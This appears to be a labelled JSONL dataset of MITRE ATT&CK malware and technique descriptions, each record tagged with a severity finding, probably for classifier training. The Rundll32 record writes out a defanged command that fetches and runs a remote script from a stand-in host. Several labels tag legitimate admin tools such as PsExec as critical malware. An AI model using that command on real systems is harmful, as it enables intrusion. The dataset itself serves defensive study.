{"id": "mitre_00214", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RedLeaves\n\nType: malware\nPlatforms: Windows\n\n[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RedLeaves", "malware_type": "malware"}}]}
{"id": "mitre_00215", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gather Victim Identity Information\n\nTechnique: T1589\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1589", "technique_name": "Gather Victim Identity Information", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00216", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Outlook Forms\n\nTechnique: T1137.003\nTactics: persistence\nPlatforms: Windows, Office Suite\n\nAdversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1137.003", "technique_name": "Outlook Forms", "tactics": ["persistence"]}}]}
{"id": "mitre_00217", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AuditCred\n\nType: malware\nPlatforms: Windows\n\n[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "AuditCred", "malware_type": "malware"}}]}
{"id": "mitre_00218", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Melcoz\n\nType: malware\nPlatforms: Windows\n\n[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Melcoz", "malware_type": "malware"}}]}
{"id": "mitre_00219", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Email Addresses\n\nTechnique: T1589.002\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1589.002", "technique_name": "Email Addresses", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00220", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Systemctl\n\nTechnique: T1569.003\nTactics: execution\nPlatforms: Linux\n\nAdversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications. \n\nAdversaries may use systemctl to execute commands or programs as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s. Common subcommands include: `systemctl start`, `systemctl stop`, `systemctl enable`, `systemctl disable`, and `systemctl status`.(Citation: Red Hat Systemctl 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1569.003", "technique_name": "Systemctl", "tactics": ["execution"]}}]}
{"id": "mitre_00221", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NETWIRE\n\nType: malware\nPlatforms: Windows, Linux, macOS\n\n[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NETWIRE", "malware_type": "malware"}}]}
{"id": "mitre_00222", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DRATzarus\n\nType: malware\nPlatforms: Windows\n\n[DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DRATzarus", "malware_type": "malware"}}]}
{"id": "mitre_00223", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Windows Service\n\nTechnique: T1543.003\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create \u2018hidden\u2019 services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1543.003", "technique_name": "Windows Service", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00224", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Octopus\n\nType: malware\nPlatforms: Windows\n\n[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Octopus", "malware_type": "malware"}}]}
{"id": "mitre_00225", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Proc Memory\n\nTechnique: T1055.009\nTactics: defense-evasion, privilege-escalation\nPlatforms: Linux\n\nAdversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1055.009", "technique_name": "Proc Memory", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00226", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Component Firmware\n\nTechnique: T1109\nTactics: defense-evasion, persistence\nPlatforms: Windows\n\nSome adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1109", "technique_name": "Component Firmware", "tactics": ["defense-evasion", "persistence"]}}]}
{"id": "mitre_00227", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HTTPBrowser\n\nType: malware\nPlatforms: Windows\n\n[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HTTPBrowser", "malware_type": "malware"}}]}
{"id": "mitre_00228", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Carbon\n\nType: malware\nPlatforms: Windows\n\n[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Carbon", "malware_type": "malware"}}]}
{"id": "mitre_00229", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PoisonIvy\n\nType: malware\nPlatforms: Windows\n\n[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PoisonIvy", "malware_type": "malware"}}]}
{"id": "mitre_00230", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# VNC\n\nTechnique: T1021.005\nTactics: lateral-movement\nPlatforms: Linux, Windows, macOS\n\nAdversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\u201cremote framebuffer\u201d) protocol to enable users to remotely control another computer\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1021.005", "technique_name": "VNC", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00231", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Local Groups\n\nTechnique: T1069.001\nTactics: discovery\nPlatforms: Linux, macOS, Windows\n\nAdversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1069.001", "technique_name": "Local Groups", "tactics": ["discovery"]}}]}
{"id": "mitre_00232", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AADInternals\n\nType: tool\nPlatforms: Windows, Office Suite, Identity Provider\n\n[AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "AADInternals", "malware_type": "tool"}}]}
{"id": "mitre_00233", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MailSniper\n\nType: tool\nPlatforms: Windows, Office Suite\n\nMailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "MailSniper", "malware_type": "tool"}}]}
{"id": "mitre_00234", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Lucifer\n\nType: malware\nPlatforms: Windows\n\n[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Lucifer", "malware_type": "malware"}}]}
{"id": "mitre_00235", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n\nTechnique: T1048.002\nTactics: exfiltration\nPlatforms: Linux, macOS, Windows, ESXi\n\nAdversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1048.002", "technique_name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00236", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SVCReady\n\nType: malware\nPlatforms: Windows\n\n[SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SVCReady", "malware_type": "malware"}}]}
{"id": "mitre_00237", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Get2\n\nType: malware\nPlatforms: Windows\n\n[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Get2", "malware_type": "malware"}}]}
{"id": "mitre_00238", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PsExec\n\nType: tool\nPlatforms: Windows\n\n[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PsExec", "malware_type": "tool"}}]}
{"id": "mitre_00239", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CaddyWiper\n\nType: malware\nPlatforms: Windows\n\n[CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CaddyWiper", "malware_type": "malware"}}]}
{"id": "mitre_00240", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gold Dragon\n\nType: malware\nPlatforms: Windows\n\n[Gold Dragon](https://attack.mitre.org/software/S0249) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://attack.mitre.org/software/S0249) was used along with [Brave Prince](https://attack.mitre.org/software/S0252) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Gold Dragon", "malware_type": "malware"}}]}
{"id": "mitre_00241", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# WINDSHIELD\n\nType: malware\n\n[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "WINDSHIELD", "malware_type": "malware"}}]}
{"id": "mitre_00242", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PS1\n\nType: malware\nPlatforms: Windows\n\n[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PS1", "malware_type": "malware"}}]}
{"id": "mitre_00243", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Netwalker\n\nType: malware\nPlatforms: Windows\n\n[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Netwalker", "malware_type": "malware"}}]}
{"id": "mitre_00244", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Rundll32\n\nTechnique: T1218.011\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1218.011", "technique_name": "Rundll32", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00245", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disk Wipe\n\nTechnique: T1561\nTactics: impact\nPlatforms: Linux, macOS, Windows, Network Devices\n\nAdversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1561", "technique_name": "Disk Wipe", "tactics": ["impact"]}}]}
{"id": "mitre_00246", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# More_eggs\n\nType: malware\nPlatforms: Windows\n\n[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable \"More_eggs\" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "More_eggs", "malware_type": "malware"}}]}
{"id": "mitre_00247", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SEO Poisoning\n\nTechnique: T1608.006\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site\u2019s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)\n\nTo help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)\n\nIn addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site\u2019s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1608.006", "technique_name": "SEO 